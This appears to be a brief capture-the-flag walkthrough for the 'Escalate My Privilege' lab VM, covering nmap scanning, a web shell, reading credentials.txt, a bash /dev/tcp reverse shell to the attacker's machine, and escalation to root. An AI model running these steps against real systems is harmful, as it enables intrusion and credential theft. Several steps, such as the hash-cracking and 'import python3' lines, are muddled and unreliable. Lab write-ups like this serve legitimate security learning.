Escalate My Privilege
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
Ans: First, Open Escalate_my_privilage in VM. We can see the IP address of 192.168.1.13.
Ans: By nmap -sV 192.168.1.13 connect to Escalate_my_privilage VM to watch how many ports are open.
Ans: Connect to your Escalate_my_privilage IP address 192.168.1.13.
Ans: Go to Inspect element we can find phpbash.php to open.
Ans: (ls) to watch version files list.
Ans: Make server connection from kali ( sudo python3 -m http.server 80 ) your Escalate_my_privilage. Make shell.php file to connect from 192.168.1.13.
Ans: I found at whoami (apache), id uid=48, ls -la found total 44 files.
Ans: I am in /var/www/html, cat robots.txt user-agent: *
Ans: Inside the home directory, I found armour folder and when I go through it and check the file then I found some files but there I found the file name as credentials.txt. I had found the root password md5 (rootroot1).
Ans: After cracking string rootroot1 using md5 we got a hash password.
Shell shoveling, in network security, refers to the act of redirecting the input and output of a shell to a service so that it can be remotely accessed. In computing, the most basic method of interfacing with the operating system is the shell.
Ans: connect from web shell to kali device (bash -c ‘exec bash -i &>/dev/tcp/192.168.1.14/4949 <&1’).
Ans: I have found id, apache.
Ans: Command su armour password hash password which we had cracked before.
Ans: import python3 After getting python 3 we got a root privilege.
Ans: Get root user.